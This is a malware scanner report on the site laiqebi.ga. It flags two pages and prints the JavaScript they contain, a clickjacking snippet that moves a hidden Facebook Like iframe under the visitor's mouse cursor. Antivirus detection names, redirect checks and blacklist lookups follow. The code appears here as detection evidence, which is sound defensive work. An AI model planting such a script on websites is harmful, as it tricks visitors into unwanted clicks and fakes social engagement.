New scan:

Malware Scanner report for laiqebi.ga

Malicious/Suspicious/Total urls checked
2/0/16
2 pages have malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://laiqebi.ga/news/2014-04-26-71
200 OK
Content-Length: 55606
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){
var Xcord = 0,
Ycord = 0,
IE = document.all ? true : false;
if (!IE) document.captureEvents(Event.MOUSEMOVE);
var lbox = document.createElement('iframe');
lbox.src = 'http://www.facebook.com/plugins/like.php?href=' + encodeURIComponent( 'https://www.facebook.com/myfilmi.in') + '&layout=standard&show_faces=true&width=53&action=lbox&colorscheme=light&height=80' + ' style="z-index:9999999999999999999999999999
... 565 bytes are skipped ...
/> window.removeEventListener('mousemove', mouseMove, false);
}, 9000);
function mouseMove(e) {
if (IE) {
Xcord = event.clientX + document.body.scrollLeft;
Ycord = event.clientY + document.body.scrollTop;
} else {
Xcord = e.pageX;
Ycord = e.pageY;
}

if (Xcord < 0) Xcord = 0;
if (Ycord < 0) Ycord = 0;

lbox.style.top = (Ycord - 8) + 'px';
lbox.style.left = (Xcord - 1) + 'px';

return true
}
})();

Antivirus reports:

Avast
JS:Clickjack-AA [Trj]
Ikarus
Trojan.JS.Clicker
Fortinet
JS/FBJack.A!tr
Sophos
Mal/FBJack-I

http://s104.ucoz.net/src/jquery-1.7.2.js
200 OK
Content-Length: 94840
Content-Type: text/javascript
clean
http://s104.ucoz.net/src/ulightbox/ulightbox.js
200 OK
Content-Length: 22097
Content-Type: text/javascript
clean
http://s104.ucoz.net/src/uwnd.js?2
200 OK
Content-Length: 228554
Content-Type: text/javascript
clean
http://s58.ucoz.net/src/jquery-1.7.2.js
200 OK
Content-Length: 94840
Content-Type: text/javascript
clean
http://laiqebi.ga/designs_34/jquery.easing.js
200 OK
Content-Length: 8097
Content-Type: text/javascript
clean
http://laiqebi.ga/designs_34/script.js
200 OK
Content-Length: 14174
Content-Type: text/javascript
clean
http://laiqebi.ga/designs_34/scripts.js
200 OK
Content-Length: 866
Content-Type: text/javascript
clean
http://counter.top.ge/cgi-bin/cod?100+95092
200 OK
Content-Length: 374
Content-Type: application/x-javascript
clean
http://links.boom.ge/jc.php?id=60048
200 OK
Content-Length: 276
Content-Type: text/html
clean
http://links.boom.ge/test404page.js
404 Not Found
Content-Length: 483
Content-Type: text/html
clean
http://trafka.ru/code/popup.php?id=313
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Wed, 22 Oct 2014 06:25:25 GMT
Location: http://www.trafka.ru/code/popup.php?id=313
Server: nginx
Vary: Accept-Encoding
Content-Length: 325
Content-Type: text/html; charset=iso-8859-1
clean
http://www.trafka.ru/code/popup.php?id=313
200 OK
Content-Length: 153
Content-Type: text/html
clean
http://laiqebi.ga//ajax.googleapis.com/ajax/libs/webfont/1.4.2/webfont.js/
404 Not Found
Content-Length: 6869
Content-Type: text/html
clean
http://laiqebi.ga/
200 OK
Content-Length: 62779
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){
var Xcord = 0,
Ycord = 0,
IE = document.all ? true : false;
if (!IE) document.captureEvents(Event.MOUSEMOVE);
var lbox = document.createElement('iframe');
lbox.src = 'http://www.facebook.com/plugins/like.php?href=' + encodeURIComponent( 'https://www.facebook.com/myfilmi.in') + '&amp;layout=standard&amp;show_faces=true&amp;width=53&amp;action=lbox&amp;colorscheme=light&amp;height=80' + ' style="z-index:9999999999999999999999999999
... 565 bytes are skipped ...
/> window.removeEventListener('mousemove', mouseMove, false);
}, 9000);
function mouseMove(e) {
if (IE) {
Xcord = event.clientX + document.body.scrollLeft;
Ycord = event.clientY + document.body.scrollTop;
} else {
Xcord = e.pageX;
Ycord = e.pageY;
}

if (Xcord < 0) Xcord = 0;
if (Ycord < 0) Ycord = 0;

lbox.style.top = (Ycord - 8) + 'px';
lbox.style.left = (Xcord - 1) + 'px';

return true
}
})();

Antivirus reports:

Avast
JS:Clickjack-AA [Trj]
Ikarus
Trojan.JS.Clicker
Fortinet
JS/FBJack.A!tr
Sophos
Mal/FBJack-I

http://connect.facebook.net/ka_GE/all.js
200 OK
Content-Length: 163835
Content-Type: application/x-javascript
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: laiqebi.ga

Result:
HTTP/1.1 200 OK
Cache-Control: no-cache
Cache-Control: no-store
Cache-Control: private
Connection: close
Date: Wed, 22 Oct 2014 06:25:26 GMT
Pragma: no-cache
Server: uServ/3.2.2
Content-Type: text/html; charset=UTF-8
Set-Cookie: 8musicebiuCoz=; path=/; expires=Mon, 22-Oct-2012 06:25:25 GMT; domain=.laiqebi.ga;
Set-Cookie: 8musicebiuzll=1413959125; path=/; expires=Thu, 22-Oct-2015 06:25:25 GMT; domain=.laiqebi.ga;
Set-Cookie: 8musicebiuCoz=; path=/; expires=Mon, 22-Oct-2012 06:25:25 GMT; domain=.laiqebi.ga;
Second query (visit from search engine):
GET / HTTP/1.1
Host: laiqebi.ga
Referer: http://www.google.com/search?q=laiqebi.ga

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=laiqebi.ga

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://laiqebi.ga/

Result: laiqebi.ga is not infected or malware details are not published yet.